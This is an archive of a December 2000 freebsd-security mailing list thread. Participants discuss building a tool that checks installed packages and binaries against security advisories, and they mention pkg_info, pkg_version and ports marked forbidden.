queries a > central database with all the security advisories, checks the local system > for comparisons and vulnerabilities against that database and reports to the > user who ran the util. > > ie, sacheck -H sa-host.freebsd.org Such thing already exists for NetBSD, at least for pkgs/pkgsrc. -- Regards: Szilveszter ADAM Szeged University Szeged Hungary To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Dec 15 16:22:26 2000 From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 16:22:23 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id C1AA937B402 for ; Fri, 15 Dec 2000 16:22:22 -0800 (PST) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id eBG0MMC00515; Fri, 15 Dec 2000 16:22:22 -0800 (PST) Date: Fri, 15 Dec 2000 16:22:22 -0800 From: Alfred Perlstein To: Some Person Cc: freebsd-security@FreeBSD.ORG Subject: Re: Security Update Tool.. Message-ID: <20001215162222.P19572@fw.wintelcom.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from ntvsunix@hotmail.com on Sat, Dec 16, 2000 at 12:16:29AM +0000 Sender: bright@fw.wintelcom.net Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Some Person [001215 16:16] wrote: > Hey ppl. Sorry I just joined the list so I dunno what kinda posts usally go > on here but I was just browsing www.freebsd.org/security and... It's usually a good idea to read the list charter and watch a couple of emails go by before posting to it. Your post seems pretty much on topic though. > Well, seeing there's new security discoveries, patches and a whole schlew of > CERT advisories etc.. it's hard to keep up with what needs securing, and > what to secure, from the base system, from the ports, etc. > > My question is, is there a util yet that in theory (maybe if so, or if > someone writes one would work differently than what I'm imagining) queries a > central database with all the security advisories, checks the local system > for comparisons and vulnerabilities against that database and reports to the > user who ran the util. > > ie, sacheck -H sa-host.freebsd.org > > I completely made that up, but jsut an idea. ie, sacheck (security advisor > check) checks against -H sa-host.freebsd.org. > > Please, if I sound like a complete idiot, no need to flame.. ;) I'm trying > to explain what I think would be a good idea in the best way I can via email > and I'm still an intermediate (non-expert) FreeBSD user. I don't know > programming (yet) so I probly don't have all the terms, but I do have ideas. > > ps: Hope I did make atleast some sense in describing my idea. It's actually a very good idea. On FreeBSD you can output the name/version of all the installed packages just by typing 'pkg_info' if someone were to setup a website with a simple database one could just make http requests to it about each installed package. Now the question is... If you just asked someone if your version of wu-ftpd is safe or not, and they know the source IP... can you trust them? :) -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Dec 15 16:28:30 2000 From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 16:28:28 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from s1-c2.cnmnetwork.com (s1-c2.cnmnetwork.com [209.163.64.71]) by hub.freebsd.org (Postfix) with SMTP id 519FB37B400 for ; Fri, 15 Dec 2000 16:28:28 -0800 (PST) Received: (qmail 23159 invoked from network); 15 Dec 2000 16:27:04 -0800 Received: from prometheus.cnmnetwork.com (HELO compton) (irc@209.79.28.5) by s1-c2.cnmnetwork.com with SMTP; 15 Dec 2000 16:27:04 -0800 Date: Fri, 15 Dec 2000 16:41:31 -0800 (PST) From: jrz Reply-To: jrz Subject: Re: Security Update Tool.. To: security@freebsd.org MIME-Version: 1.0 Content-Type: TEXT/plain; charset=us-ascii Content-MD5: lKuS6XRrvG1dpZ0H/EDzPQ== X-Mailer: dtmail 1.3.0 @(#)CDE Version 1.4 SunOS 5.8 i86pc i386 Message-Id: <20001216002828.519FB37B400@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >> My question is, is there a util yet that in theory (maybe if so, or if >> someone writes one would work differently than what I'm imagining) queries a >> central database with all the security advisories, checks the local system >> for comparisons and vulnerabilities against that database and reports to the >> user who ran the util. >> >> ie, sacheck -H sa-host.freebsd.org would be fairly easy to write a shell or perl script that checks for current advisories and prints it out in pretty format. -jrz --- Jacob Zehnder | Systems Engineer CNM Network | http://www.cnmnetwork.com business: jrz@cnmnetwork.com other: jrz@rackmount.org --- "Where am I, and what am I doing in this handbasket?" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Dec 15 16:42:44 2000 From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 16:42:42 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from venus.entic.net (venus.entic.net [63.125.62.130]) by hub.freebsd.org (Postfix) with ESMTP id 153A937B400 for ; Fri, 15 Dec 2000 16:42:42 -0800 (PST) Received: (qmail 31137 invoked from network); 16 Dec 2000 00:42:40 -0000 Received: from mars.entic.net (qmailr@63.125.62.132) by venus.entic.net with SMTP; 16 Dec 2000 00:42:40 -0000 Received: (qmail 17420 invoked by uid 100); 16 Dec 2000 00:42:43 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 16 Dec 2000 00:42:43 -0000 Date: Fri, 15 Dec 2000 16:42:43 -0800 (PST) From: Anil Jangity To: jrz Cc: Subject: Re: Security Update Tool.. In-Reply-To: <20001216002828.519FB37B400@hub.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I think he was looking for something a little more "automated". Something like IE's "Window's update" for freebsd ;-) I don't think its too difficult to do this, all you do is do ident on any binaries that are on the local system and compare the version with the version string in the advisories... the advisory might need some formatting changes? just thinking out loud. Fri, 15 Dec 2000 (4:41pm -0800) Message: @ >> My question is, is there a util yet that in theory (maybe if so, or if @ >> someone writes one would work differently than what I'm imagining) queries a @ >> central database with all the security advisories, checks the local system @ >> for comparisons and vulnerabilities against that database and reports to the @ >> user who ran the util. @ >> @ >> ie, sacheck -H sa-host.freebsd.org @ @ would be fairly easy to write a shell or perl script that checks for current @ advisories and prints it out in pretty format. @ @ -jrz @ @ @ @ --- @ Jacob Zehnder | Systems Engineer @ CNM Network | http://www.cnmnetwork.com @ business: jrz@cnmnetwork.com @ other: jrz@rackmount.org @ --- @ "Where am I, and what am I doing in this handbasket?" @ @ @ @ To Unsubscribe: send mail to majordomo@FreeBSD.org @ with "unsubscribe freebsd-security" in the body of the message @ @ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Dec 15 16:44: 9 2000 From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 16:44:05 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from sunny.pacific.net.sg (sunny.pacific.net.sg [203.120.90.127]) by hub.freebsd.org (Postfix) with ESMTP id B82D837B400 for ; Fri, 15 Dec 2000 16:44:04 -0800 (PST) Received: from pop1.pacific.net.sg (pop1.pacific.net.sg [203.120.90.85]) by sunny.pacific.net.sg with ESMTP id eBG0i1o25371; Sat, 16 Dec 2000 08:44:01 +0800 (SGT) Received: from gchang (spoff250.pacific.net.sg [203.120.94.250]) by pop1.pacific.net.sg with SMTP id IAA09335; Sat, 16 Dec 2000 08:44:01 +0800 (SGT) Message-ID: <005e01c066f8$9da172a0$fa5e78cb@gchang> From: "James Lim" To: "Anil Jangity" , "jrz" Cc: References: Subject: Re: Security Update Tool.. Date: Sat, 16 Dec 2000 08:39:14 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi all, brilliant idea James Lim Technical Support Executive Pacific Internet Limited 89 Science Park Drive #02-05/06 The Rutherford Singapore 118261 Finger evilfry@sg.freebsd.org for PGP key. ----- Original Message ----- From: "Anil Jangity" To: "jrz" Cc: Sent: Saturday, December 16, 2000 8:42 AM Subject: Re: Security Update Tool.. > I think he was looking for something a little more "automated". Something > like IE's "Window's update" for freebsd ;-) > > I don't think its too difficult to do this, all you do is do ident on any > binaries that are on the local system and compare the version with the > version string in the advisories... the advisory might need some > formatting changes? > > just thinking out loud. > > > Fri, 15 Dec 2000 (4:41pm -0800) Message: > > @ >> My question is, is there a util yet that in theory (maybe if so, or if > @ >> someone writes one would work differently than what I'm imagining) queries a > @ >> central database with all the security advisories, checks the local system > @ >> for comparisons and vulnerabilities against that database and reports to the > @ >> user who ran the util. > @ >> > @ >> ie, sacheck -H sa-host.freebsd.org > @ > @ would be fairly easy to write a shell or perl script that checks for current > @ advisories and prints it out in pretty format. > @ > @ -jrz > @ > @ > @ > @ --- > @ Jacob Zehnder | Systems Engineer > @ CNM Network | http://www.cnmnetwork.com > @ business: jrz@cnmnetwork.com > @ other: jrz@rackmount.org > @ --- > @ "Where am I, and what am I doing in this handbasket?" > @ > @ > @ > @ To Unsubscribe: send mail to majordomo@FreeBSD.org > @ with "unsubscribe freebsd-security" in the body of the message > @ > @ > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Dec 15 17: 1: 1 2000 From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 17:00:56 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from daedalus.cs.brandeis.edu (daedalus.cs.brandeis.edu [129.64.3.179]) by hub.freebsd.org (Postfix) with ESMTP id D972737B402 for ; Fri, 15 Dec 2000 17:00:55 -0800 (PST) Received: from localhost (meshko@localhost) by daedalus.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id UAA01777; Fri, 15 Dec 2000 20:00:47 -0500 Date: Fri, 15 Dec 2000 20:00:47 -0500 (EST) From: Mikhail Kruk To: Anil Jangity Cc: jrz , Subject: Re: Security Update Tool.. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: meshko@daedalus.cs.brandeis.edu Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm not sure that many people would like that kind of automation, but what is really missing IMHO is ability to mark ports whichs are insecure and add some option to pkg_info which will check all installed packages. I think OpenBSD has exacty this, no? > I think he was looking for something a little more "automated". Something > like IE's "Window's update" for freebsd ;-) > > I don't think its too difficult to do this, all you do is do ident on any > binaries that are on the local system and compare the version with the > version string in the advisories... the advisory might need some > formatting changes? > > just thinking out loud. > > > Fri, 15 Dec 2000 (4:41pm -0800) Message: > > @ >> My question is, is there a util yet that in theory (maybe if so, or if > @ >> someone writes one would work differently than what I'm imagining) queries a > @ >> central database with all the security advisories, checks the local system > @ >> for comparisons and vulnerabilities against that database and reports to the > @ >> user who ran the util. > @ >> > @ >> ie, sacheck -H sa-host.freebsd.org > @ > @ would be fairly easy to write a shell or perl script that checks for current > @ advisories and prints it out in pretty format. > @ > @ -jrz > @ > @ > @ > @ --- > @ Jacob Zehnder | Systems Engineer > @ CNM Network | http://www.cnmnetwork.com > @ business: jrz@cnmnetwork.com > @ other: jrz@rackmount.org > @ --- > @ "Where am I, and what am I doing in this handbasket?" > @ > @ > @ > @ To Unsubscribe: send mail to majordomo@FreeBSD.org > @ with "unsubscribe freebsd-security" in the body of the message > @ > @ > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Dec 15 17: 3:25 2000 From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 17:03:21 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from seed.pacific.net.sg (seed.pacific.net.sg [203.120.90.77]) by hub.freebsd.org (Postfix) with ESMTP id C475837B400 for ; Fri, 15 Dec 2000 17:03:20 -0800 (PST) Received: from pop1.pacific.net.sg (pop1.pacific.net.sg [203.120.90.85]) by seed.pacific.net.sg with ESMTP id eBG13IJ20934; Sat, 16 Dec 2000 09:03:18 +0800 (SGT) Received: from gchang (spoff250.pacific.net.sg [203.120.94.250]) by pop1.pacific.net.sg with SMTP id JAA24872; Sat, 16 Dec 2000 09:03:16 +0800 (SGT) Message-ID: <007901c066fb$4f187040$fa5e78cb@gchang> From: "James Lim" To: "Mikhail Kruk" , "Anil Jangity" Cc: "jrz" , References: Subject: Re: Security Update Tool.. Date: Sat, 16 Dec 2000 08:58:30 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, Some of the ports are actually marked forbidden due to the security hazards. That is served as a warning to users. But of course if they want to risk it they just have to comment it James Lim Technical Support Executive Pacific Internet Limited 89 Science Park Drive #02-05/06 The Rutherford Singapore 118261 Finger evilfry@sg.freebsd.org for PGP key. ----- Original Message ----- From: "Mikhail Kruk" To: "Anil Jangity" Cc: "jrz" ; Sent: Saturday, December 16, 2000 9:00 AM Subject: Re: Security Update Tool.. > I'm not sure that many people would like that kind of automation, but what > is really missing IMHO is ability to mark ports whichs are insecure and > add some option to pkg_info which will check all installed packages. I > think OpenBSD has exacty this, no? > > > I think he was looking for something a little more "automated". Something > > like IE's "Window's update" for freebsd ;-) > > > > I don't think its too difficult to do this, all you do is do ident on any > > binaries that are on the local system and compare the version with the > > version string in the advisories... the advisory might need some > > formatting changes? > > > > just thinking out loud. > > > > > > Fri, 15 Dec 2000 (4:41pm -0800) Message: > > > > @ >> My question is, is there a util yet that in theory (maybe if so, or if > > @ >> someone writes one would work differently than what I'm imagining) queries a > > @ >> central database with all the security advisories, checks the local system > > @ >> for comparisons and vulnerabilities against that database and reports to the > > @ >> user who ran the util. > > @ >> > > @ >> ie, sacheck -H sa-host.freebsd.org > > @ > > @ would be fairly easy to write a shell or perl script that checks for current > > @ advisories and prints it out in pretty format. > > @ > > @ -jrz > > @ > > @ > > @ > > @ --- > > @ Jacob Zehnder | Systems Engineer > > @ CNM Network | http://www.cnmnetwork.com > > @ business: jrz@cnmnetwork.com > > @ other: jrz@rackmount.org > > @ --- > > @ "Where am I, and what am I doing in this handbasket?" > > @ > > @ > > @ > > @ To Unsubscribe: send mail to majordomo@FreeBSD.org > > @ with "unsubscribe freebsd-security" in the body of the message > > @ > > @ > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Dec 15 17: 5:11 2000 From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 17:05:10 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from epsilon.lucida.ca (epsilon.lucida.ca [216.95.146.6]) by hub.freebsd.org (Postfix) with SMTP id 9085A37B400 for ; Fri, 15 Dec 2000 17:05:09 -0800 (PST) Received: (qmail 31925 invoked by uid 1000); 16 Dec 2000 01:05:08 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 16 Dec 2000 01:05:08 -0000 Date: Fri, 15 Dec 2000 20:05:06 -0500 (EST) From: Matt Heckaman X-Sender: matt@epsilon.lucida.ca To: Alfred Perlstein Cc: FreeBSD-SECURITY Subject: Re: Security Update Tool.. In-Reply-To: <20001215162222.P19572@fw.wintelcom.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, 15 Dec 2000, Alfred Perlstein wrote: ... : If you just asked someone if your version of wu-ftpd is safe or not, : and they know the source IP... can you trust them? :) Maybe yes, maybe no; however if you're running a vulnerable daemon, it's quite moot since the mass-ip-block-scanning script kiddies will find it within a week anyways. :) * Matt Heckaman - mailto:matt@lucida.qc.ca http://www.lucida.qc.ca/ * * GPG fingerprint - A9BC F3A8 278E 22F2 9BDA BFCF 74C3 2D31 C035 5390 * -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: http://www.lucida.qc.ca/pgp iD8DBQE6Or/EdMMtMcA1U5ARAgzYAKCmynrVspjC4y1LdkWydyVZ+62CHACgrDQ+ hg5DBpXp9PRjXOtYV+mcyLY= =ChVW -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Dec 15 17: 5:19 2000 From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 17:05:17 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from daedalus.cs.brandeis.edu (daedalus.cs.brandeis.edu [129.64.3.179]) by hub.freebsd.org (Postfix) with ESMTP id 15B9E37B400 for ; Fri, 15 Dec 2000 17:05:17 -0800 (PST) Received: from localhost (meshko@localhost) by daedalus.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id UAA01789; Fri, 15 Dec 2000 20:05:08 -0500 Date: Fri, 15 Dec 2000 20:05:08 -0500 (EST) From: Mikhail Kruk To: James Lim Cc: Anil Jangity , jrz , Subject: Re: Security Update Tool.. In-Reply-To: <007901c066fb$4f187040$fa5e78cb@gchang> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: meshko@daedalus.cs.brandeis.edu Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org um... marking port forbidden will prevent you from installing it, but is there ability to audit ports you have already installed? > Hi, > Some of the ports are actually marked forbidden due to the security > hazards. That is served as a warning to users. But of course if they want to > risk it they just have to comment it > > James Lim > Technical Support Executive > > Pacific Internet Limited > 89 Science Park Drive > #02-05/06 The Rutherford > Singapore 118261 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Dec 15 17: 7:22 2000 From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 17:07:19 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from seed.pacific.net.sg (seed.pacific.net.sg [203.120.90.77]) by hub.freebsd.org (Postfix) with ESMTP id 9F33837B400 for ; Fri, 15 Dec 2000 17:07:18 -0800 (PST) Received: from pop1.pacific.net.sg (pop1.pacific.net.sg [203.120.90.85]) by seed.pacific.net.sg with ESMTP id eBG17HJ24134; Sat, 16 Dec 2000 09:07:17 +0800 (SGT) Received: from gchang (spoff250.pacific.net.sg [203.120.94.250]) by pop1.pacific.net.sg with SMTP id JAA28528; Sat, 16 Dec 2000 09:07:17 +0800 (SGT) Message-ID: <008d01c066fb$ddf63ae0$fa5e78cb@gchang> From: "James Lim" To: "Mikhail Kruk" Cc: "Anil Jangity" , "jrz" , References: Subject: Re: Security Update Tool.. Date: Sat, 16 Dec 2000 09:02:31 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org No, that was just in response to marking ports that are insecure :) cheers James Lim Technical Support Executive Pacific Internet Limited 89 Science Park Drive #02-05/06 The Rutherford Singapore 118261 Finger evilfry@sg.freebsd.org for PGP key. ----- Original Message ----- From: "Mikhail Kruk" To: "James Lim" Cc: "Anil Jangity" ; "jrz" ; Sent: Saturday, December 16, 2000 9:05 AM Subject: Re: Security Update Tool.. > um... marking port forbidden will prevent you from installing it, but is > there ability to audit ports you have already installed? > > > Hi, > > Some of the ports are actually marked forbidden due to the security > > hazards. That is served as a warning to users. But of course if they want to > > risk it they just have to comment it > > > > James Lim > > Technical Support Executive > > > > Pacific Internet Limited > > 89 Science Park Drive > > #02-05/06 The Rutherford > > Singapore 118261 > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Dec 15 17:10:21 2000 From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 17:10:20 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id DC63C37B400 for ; Fri, 15 Dec 2000 17:10:19 -0800 (PST) Received: by peitho.fxp.org (Postfix, from userid 1501) id AF8FA1360E; Fri, 15 Dec 2000 20:10:18 -0500 (EST) Date: Fri, 15 Dec 2000 20:10:18 -0500 From: Chris Faulhaber To: Mikhail Kruk Cc: James Lim , security@FreeBSD.ORG Subject: Re: Security Update Tool.. Message-ID: <20001215201018.A90289@peitho.fxp.org> References: <007901c066fb$4f187040$fa5e78cb@gchang> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from meshko@cs.brandeis.edu on Fri, Dec 15, 2000 at 08:05:08PM -0500 Sender: cdf.lists@fxp.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Dec 15, 2000 at 08:05:08PM -0500, Mikhail Kruk wrote: > um... marking port forbidden will prevent you from installing it, but is > there ability to audit ports you have already installed? > Not exactly, though pkg_version(1) will tell you what packages require updating. -- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Dec 15 17:57:46 2000 From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 17:57:45 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from hellfire.hexdump.org (h006097e24f05.ne.mediaone.net [24.128.117.73]) by hub.freebsd.org (Postfix) with ESMTP id 8337D37B400 for ; Fri, 15 Dec 2000 17:57:44 -0800 (PST) Received: from localhost (freebsd@localhost) by hellfire.hexdump.org (8.11.1/8.11.1) with ESMTP id eBG1xhl12127; Fri, 15 Dec 2000 20:59:44 -0500 (EST) (envelope-from freebsd@hexdump.org) Date: Fri, 15 Dec 2000 20:59:43 -0500 (EST) From: Jeff Gentry To: Mikhail Kruk Cc: Anil Jangity , jrz , security@FreeBSD.ORG Subject: Re: Security Update Tool.. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 15 Dec 2000, Mikhail Kruk wrote: > I'm not sure that many people would like that kind of automation, but what > is really missing IMHO is ability to mark ports whichs are insecure and > add some option to pkg_info which will check all installed packages. I > think OpenBSD has exacty this, no? I don't think it has to be automated *and* "behind the covers" ... I think a 2 stage process would be good -> first stage figures out what (if any) you need, and if possible, explains why. The 2nd stage would allow you to apply changes if you wanted to or not. -- Jeff Gentry jester@hexdump.org gentrj@hexdump.org SEX DRUGS UNIX To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Dec 15 18: 9:58 2000 From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 18:09:56 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from sunny.pacific.net.sg (sunny.pacific.net.sg [203.120.90.127]) by hub.freebsd.org (Postfix) with ESMTP id 4E6EA37B400 for ; Fri, 15 Dec 2000 18:09:55 -0800 (PST) Received: from pop1.pacific.net.sg (pop1.pacific.net.sg [203.120.90.85]) by sunny.pacific.net.sg with ESMTP id eBG29oo14422; Sat, 16 Dec 2000 10:09:51 +0800 (SGT) Received: from gchang (spoff250.pacific.net.sg [203.120.94.250]) by pop1.pacific.net.sg with SMTP id KAA05006; Sat, 16 Dec 2000 10:09:50 +0800 (SGT) Message-ID: <00a701c06704$9ae4f440$fa5e78cb@gchang> From: "James Lim" To: "Jeff Gentry" , "Mikhail Kruk" Cc: "Anil Jangity" , "jrz" , References: Subject: Re: Security Update Tool.. Date: Sat, 16 Dec 2000 10:05:03 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi all, Seems like today we have 2 ideas, ports autoupdate utility ( security checks too ) as well as for the src base itself? James Lim Technical Support Executive Pacific Internet Limited 89 Science Park Drive #02-05/06 The Rutherford Singapore 118261 Finger evilfry@sg.freebsd.org for PGP key. ----- Original Message ----- From: "Jeff Gentry" To: "Mikhail Kruk" Cc: "Anil Jangity" ; "jrz" ; Sent: Saturday, December 16, 2000 9:59 AM Subject: Re: Security Update Tool.. > On Fri, 15 Dec 2000, Mikhail Kruk wrote: > > I'm not sure that many people would like that kind of automation, but what > > is really missing IMHO is ability to mark ports whichs are insecure and > > add some option to pkg_info which will check all installed packages. I > > think OpenBSD has exacty this, no? > > I don't think it has to be automated *and* "behind the covers" ... > I think a 2 stage process would be good -> first stage figures out what > (if any) you need, and if possible, explains why. The 2nd stage would > allow you to apply changes if you wanted to or not. > > -- > Jeff Gentry jester@hexdump.org gentrj@hexdump.org > SEX DRUGS UNIX > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Dec 15 18:28:52 2000 From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 18:28:51 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 2F04637B400 for ; Fri, 15 Dec 2000 18:28:47 -0800 (PST) Received: from bsdie.rwsystems.net([209.197.223.2]) (1087 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Fri, 15 Dec 2000 20:27:11 -0600 (CST) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Fri, 15 Dec 2000 20:27:10 -0600 (CST) From: James Wyatt To: Chris Faulhaber Cc: Mikhail Kruk , James Lim , security@FreeBSD.ORG Subject: Re: Security Update Tool.. In-Reply-To: <20001215201018.A90289@peitho.fxp.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 15 Dec 2000, Chris Faulhaber wrote: > On Fri, Dec 15, 2000 at 08:05:08PM -0500, Mikhail Kruk wrote: > > um... marking port forbidden will prevent you from installing it, but is > > there ability to audit ports you have already installed? > > > > Not exactly, though pkg_version(1) will tell you what packages > require updating. When did this command appear? I don't have it here yet. - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Dec 15 18:34:36 2000 From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 18:34:35 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id CABC737B402 for ; Fri, 15 Dec 2000 18:34:34 -0800 (PST) Received: by peitho.fxp.org (Postfix, from userid 1000) id 1C7091360E; Fri, 15 Dec 2000 21:34:34 -0500 (EST) Date: Fri, 15 Dec 2000 21:34:34 -0500 From: Chris Faulhaber To: James Wyatt Cc: security@FreeBSD.ORG Subject: Re: Security Update Tool.. Message-ID: <20001215213433.A98440@peitho.fxp.org> References: <20001215201018.A90289@peitho.fxp.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from jwyatt@rwsystems.net on Fri, Dec 15, 2000 at 08:27:10PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Dec 15, 2000 at 08:27:10PM -0600, James Wyatt wrote: > On Fri, 15 Dec 2000, Chris Faulhaber wrote: > > On Fri, Dec 15, 2000 at 08:05:08PM -0500, Mikhail Kruk wrote: > > > um... marking port forbidden will prevent you from installing it, but is > > > there ability to audit ports you have already installed? > > > > > > > Not exactly, though pkg_version(1) will tell you what packages > > require updating. > > When did this command appear? I don't have it here yet. - Jy@ > Added to the tree on: Fri Nov 26 20:31:58 1999 UTC (12 months, 2 weeks ago) by billf See: 